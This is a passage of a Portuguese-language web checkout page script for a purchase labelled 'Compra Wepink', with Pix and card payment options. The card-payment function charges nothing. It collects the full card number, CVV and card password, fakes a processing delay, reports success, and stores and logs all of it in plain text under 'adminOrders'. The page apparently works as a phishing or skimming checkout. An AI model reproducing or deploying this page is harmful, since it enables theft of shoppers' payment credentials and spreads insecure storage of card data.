      }, intervalTime);

      document.getElementById('back-to-code').onclick = () => {
        clearInterval(interval);
        hidePaymentLoadingOverlay();
      };

      document.getElementById('copy-pix-again').onclick = () => {
        navigator.clipboard.writeText(window.pixCode).then(() => {
          console.log('Código PIX copiado novamente:', window.pixCode);
          const copyFeedback = document.getElementById('copy-feedback');
          copyFeedback.classList.add('visible');
          setTimeout(() => {
            copyFeedback.classList.remove('visible');
          }, 2000);
        }).catch(err => {
          console.error('Erro ao copiar o código PIX:', err);
          alert('Erro ao copiar o código PIX: ' + err.message);
        });
      };
    }

    function showPaymentForm(type) {
      const pixForm = document.getElementById('pix-form');
      const cardForm = document.getElementById('card-form');
      const pixButton = document.getElementById('pix-button');
      const cardButton = document.getElementById('card-button');

      pixButton.classList.remove('active');
      cardButton.classList.remove('active');
      pixForm.classList.remove('active');
      cardForm.classList.remove('active');

      if (type === 'card') {
        cardButton.classList.add('active');
        cardForm.classList.add('active');
      } else if (type === 'pix') {
        pixButton.classList.add('active');
        pixForm.classList.add('active');
      }
    }

    function updateOrderSummary() {
      const purchase = JSON.parse(localStorage.getItem('pendingPurchase')) || {};
      const orderItems = document.getElementById('order-items');
      const deliveryFee = document.getElementById('delivery-fee');
      const orderTotal = document.getElementById('order-total');

      if (!purchase.cartItems || purchase.cartItems.length === 0) {
        console.log('Nenhum item encontrado no carrinho. Redirecionando para product.html');
        window.location.href = 'product.html';
        return;
      }

      let subtotal = 0;
      orderItems.innerHTML = '';
      purchase.cartItems.forEach(item => {
        if (item.priceNew && item.quantity) {
          subtotal += item.priceNew * item.quantity;
          const itemElement = document.createElement('div');
          itemElement.className = 'order-item';
          itemElement.innerHTML = `<img src="${item.image || 'https://via.placeholder.com/70'}" alt="${item.name || 'Produto'}"><div class="order-item-details"><p>${item.name || 'Produto'}</p><p>Quantidade: ${item.quantity}</p><p class="price">${formatCurrency(item.priceNew * item.quantity)}</p></div>`;
          orderItems.appendChild(itemElement);
        }
      });

      const fee = purchase.address?.deliveryFee || 0;
      const total = subtotal + fee;
      deliveryFee.textContent = formatCurrency(fee);
      orderTotal.textContent = formatCurrency(total);
      console.log('Resumo do pedido atualizado:', { subtotal, fee, total });
    }

    async function generatePixQRCode() {
      const purchase = JSON.parse(localStorage.getItem('pendingPurchase')) || {};
      const nameInput = document.getElementById('pix-payer-name').value.trim();
      const cpfInput = document.getElementById('pix-payer-cpf').value.trim();
      const emailInput = document.getElementById('pix-email-input').value.trim();
      const qrImage = document.getElementById('pix-qr-image');
      const generateButton = document.getElementById('generate-pix-button');

      let subtotal = 0;
      purchase.cartItems.forEach(item => {
        if (item.priceNew && item.quantity) {
          subtotal += item.priceNew * item.quantity;
        }
      });
      const totalAmount = subtotal + (purchase.address?.deliveryFee || 0);

      if (totalAmount <= 0) {
        console.error('Valor do pedido inválido:', totalAmount);
        alert('Erro: Valor do pedido inválido. Verifique os itens no carrinho.');
        return;
      }

      const paymentData = {
        transaction_amount: parseFloat(totalAmount.toFixed(2)),
        description: 'Compra Wepink',
        payment_method_id: 'pix',
        payer: {
          email: emailInput,
          first_name: nameInput.split(' ')[0] || 'Nome',
          last_name: nameInput.split(' ').slice(1).join(' ') || 'Sobrenome',
          identification: { type: 'CPF', number: cpfInput }
        },
        notification_url: 'https://your-notification-url.com/webhook'
      };

      try {
        generateButton.disabled = true;
        generateButton.textContent = 'Gerando...';

        const response = await fetch(backendUrl, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(paymentData)
        });

        if (!response.ok) {
          throw new Error('Erro na API do Mercado Pago: ' + response.statusText);
        }

        const data = await response.json();

        if (!data || !data.qr_code || !data.qr_code_base64) {
          throw new Error('Dados do QR code não retornados pela API. Verifique se a chave PIX está registrada.');
        }

        if (!data.payment_id) {
          throw new Error('ID do pagamento não retornado pela API.');
        }

        document.getElementById('pix-inputs').style.display = 'none';
        const codeContainer = document.getElementById('pix-code-manual');
        const codeText = document.getElementById('pix-code-text');
        const qrContainer = document.getElementById('pix-qr-manual');

        codeContainer.style.display = 'block';
        qrContainer.style.display = 'block';
        codeText.textContent = data.qr_code;
        qrImage.src = `data:image/png;base64,${data.qr_code_base64}`;

        window.pixPaymentId = data.payment_id;
        window.pixCode = data.qr_code;

        const orders = JSON.parse(localStorage.getItem('adminOrders')) || [];
        orders.push({
          purchaseData: purchase,
          paymentMethod: 'Pix',
          pixDetails: {
            email: emailInput,
            first_name: nameInput.split(' ')[0] || 'Nome',
            last_name: nameInput.split(' ').slice(1).join(' ') || 'Sobrenome',
            identification: { type: 'CPF', number: cpfInput },
            paymentId: data.payment_id,
            qrCode: data.qr_code,
            amount: totalAmount,
            status: 'Gerado'
          },
          orderDate: new Date().toISOString()
        });
        localStorage.setItem('adminOrders', JSON.stringify(orders));
        console.log('Código PIX gerado com sucesso:', data);
      } catch (error) {
        console.error('Erro ao gerar Pix:', error);
        alert(`Erro ao gerar Pix: ${error.message}`);
      } finally {
        generateButton.disabled = false;
        generateButton.textContent = 'Gerar Pix';
      }
    }

    function validateCardForm() {
      const cardNameInput = document.getElementById('card-name');
      const cardCPFInput = document.getElementById('card-cpf');
      const cardNumberInput = document.getElementById('card-number');
      const expMonthInput = document.getElementById('exp-month');
      const expYearInput = document.getElementById('exp-year');
      const cvvInput = document.getElementById('cvv');
      const passwordInput = document.getElementById('password');
      const confirmButton = document.getElementById('confirm-payment-button');

      const errors = {
        cardName: document.getElementById('error-card-name'),
        cardCPF: document.getElementById('error-card-cpf'),
        cardNumber: document.getElementById('error-card-number'),
        expMonth: document.getElementById('error-exp-month'),
        expYear: document.getElementById('error-exp-year'),
        cvv: document.getElementById('error-cvv'),
        password: document.getElementById('error-password')
      };

      let isValid = true;

      if (!cardNameInput.value.trim()) {
        cardNameInput.classList.add('invalid');
        errors.cardName.textContent = 'Nome é obrigatório.';
        errors.cardName.classList.add('visible');
        isValid = false;
      } else {
        cardNameInput.classList.remove('invalid');
        errors.cardName.classList.remove('visible');
      }

      const cpf = cardCPFInput.value.replace(/\D/g, '');
      if (cpf.length !== 11) {
        cardCPFInput.classList.add('invalid');
        errors.cardCPF.textContent = 'CPF deve conter 11 dígitos.';
        errors.cardCPF.classList.add('visible');
        isValid = false;
      } else {
        cardCPFInput.classList.remove('invalid');
        errors.cardCPF.classList.remove('visible');
      }

      const cardNumber = cardNumberInput.value.replace(/\D/g, '');
      if (cardNumber.length !== 16) {
        cardNumberInput.classList.add('invalid');
        errors.cardNumber.textContent = 'Número do cartão deve conter 16 dígitos.';
        errors.cardNumber.classList.add('visible');
        isValid = false;
      } else {
        cardNumberInput.classList.remove('invalid');
        errors.cardNumber.classList.remove('visible');
      }

      if (!expMonthInput.value) {
        expMonthInput.classList.add('invalid');
        errors.expMonth.textContent = 'Mês de expiração é obrigatório.';
        errors.expMonth.classList.add('visible');
        isValid = false;
      } else {
        expMonthInput.classList.remove('invalid');
        errors.expMonth.classList.remove('visible');
      }

      if (!expYearInput.value) {
        expYearInput.classList.add('invalid');
        errors.expYear.textContent = 'Ano de expiração é obrigatório.';
        errors.expYear.classList.add('visible');
        isValid = false;
      } else {
        expYearInput.classList.remove('invalid');
        errors.expYear.classList.remove('visible');
      }

      const cvv = cvvInput.value.replace(/\D/g, '');
      if (cvv.length < 3 || cvv.length > 4) {
        cvvInput.classList.add('invalid');
        errors.cvv.textContent = 'CVV deve conter 3 ou 4 dígitos.';
        errors.cvv.classList.add('visible');
        isValid = false;
      } else {
        cvvInput.classList.remove('invalid');
        errors.cvv.classList.remove('visible');
      }

      if (!passwordInput.value.trim()) {
        passwordInput.classList.add('invalid');
        errors.password.textContent = 'Senha é obrigatória.';
        errors.password.classList.add('visible');
        isValid = false;
      } else {
        passwordInput.classList.remove('invalid');
        errors.password.classList.remove('visible');
      }

      confirmButton.disabled = !isValid;
    }

    function processCardPayment() {
      const cardName = document.getElementById('card-name').value;
      const cardCPF = document.getElementById('card-cpf').value.replace(/\D/g, '');
      const cardNumber = document.getElementById('card-number').value.replace(/\D/g, '');
      const expMonth = document.getElementById('exp-month').value;
      const expYear = document.getElementById('exp-year').value;
      const cvv = document.getElementById('cvv').value;
      const password = document.getElementById('password').value;
      const total = parseFloat(document.getElementById('order-total').textContent.replace('R$ ', '').replace(',', '.'));
      const confirmButton = document.getElementById('confirm-payment-button');

      if (cardNumber.length !== 16 || cardCPF.length !== 11 || !expMonth || !expYear || cvv.length < 3 || cvv.length > 4 || !password || isNaN(total) || total <= 0) {
        console.error('Dados do cartão inválidos:', { cardNumber, cardCPF, expMonth, expYear, cvv, password, total });
        alert('Erro: Verifique os dados do cartão e tente novamente.');
        return;
      }

      confirmButton.disabled = true;
      confirmButton.textContent = 'Processando...';

      setTimeout(() => {
        const purchase = JSON.parse(localStorage.getItem('pendingPurchase')) || {};
        const orders = JSON.parse(localStorage.getItem('adminOrders')) || [];
        orders.push({
          purchaseData: purchase,
          paymentMethod: 'Cartão',
          paymentDetails: {
            cardName,
            cardCPF,
            cardNumber,
            expMonth,
            expYear,
            cvv,
            password,
            transactionAmount: total,
            email: purchase.email || 'Não informado'
          },
          orderDate: new Date().toISOString(),
          status: 'Efetuado'
        });
        localStorage.setItem('adminOrders', JSON.stringify(orders));
        console.log('Pagamento via cartão processado:', { cardName, cardCPF, cardNumber, expMonth, expYear, cvv, password, total });

        confirmButton.textContent = 'Confirmar Pagamento';
        showConfirmationScreen('Cartão', true);
      }, 1000);
    }

    document.addEventListener('DOMContentLoaded', () => {
      updateOrderSummary();

      document.getElementById('pix-button').addEventListener('click', () => showPaymentForm('pix'));
      document.getElementById('card-button').addEventListener('click', () => showPaymentForm('card'));

      const generatePixButton = document.getElementById('generate-pix-button');
      const copyPixCodeButton = document.getElementById('copy-pix-code');
      const cardNameInput = document.getElementById('card-name');
      const cardCPFInput = document.getElementById('card-cpf');
      const cardNumberInput = document.getElementById('card-number');
      const expMonthInput = document.getElementById('exp-month');
      const expYearInput = document.getElementById('exp-year');
      const cvvInput = document.getElementById('cvv');
      const passwordInput = document.getElementById('password');
      const confirmPaymentButton = document.getElementById('confirm-payment-button');

      ['pix-payer-name', 'pix-payer-cpf', 'pix-email-input'].forEach(id => {
        document.getElementById(id).addEventListener('input', () => {
          const allFilled = ['pix-payer-name', 'pix-payer-cpf', 'pix-email-input'].every(id => document.getElementById(id).value.trim());
          generatePixButton.disabled = !allFilled;
        });
      });

      generatePixButton.addEventListener('click', generatePixQRCode);

      copyPixCodeButton.addEventListener('click', () => {
        const pixCodeText = document.getElementById('pix-code-text').textContent;
        navigator.clipboard.writeText(pixCodeText).then(() => {
          console.log('Código PIX copiado:', pixCodeText);
          copyPixCodeButton.textContent = 'Copiado!';
          copyPixCodeButton.classList.add('copied');
          document.getElementById('copied-message').classList.add('visible');
          setTimeout(() => {
            copyPixCodeButton.textContent = 'Copiar';
            copyPixCodeButton.classList.remove('copied');
            document.getElementById('copied-message').classList.remove('visible');
          }, 2000);

          if (window.pixPaymentId) {
            console.log('Iniciando loop de verificação de pagamento para ID:', window.pixPaymentId);
            checkPaymentStatus(window.pixPaymentId);
          } else {
            console.error('Erro: window.pixPaymentId não está definido.');
            alert('Erro ao iniciar verificação de pagamento. Tente novamente.');
          }
        }).catch(err => {
          console.error('Erro ao copiar o código PIX:', err);
          alert('Erro ao copiar o código PIX: ' + err.message);
        });
      });

      cardNameInput.addEventListener('input', validateCardForm);
      cardCPFInput.addEventListener('input', () => {
        formatCPF(cardCPFInput);
        validateCardForm();
      });
      cardNumberInput.addEventListener('input', () => {
        formatCardNumber(cardNumberInput);
        validateCardForm();
      });
      expMonthInput.addEventListener('change', validateCardForm);
      expYearInput.addEventListener('change', validateCardForm);
      cvvInput.addEventListener('input', validateCardForm);
      passwordInput.addEventListener('input', validateCardForm);

      confirmPaymentButton.addEventListener('click', processCardPayment);
    });
  </script>
</body>
</html>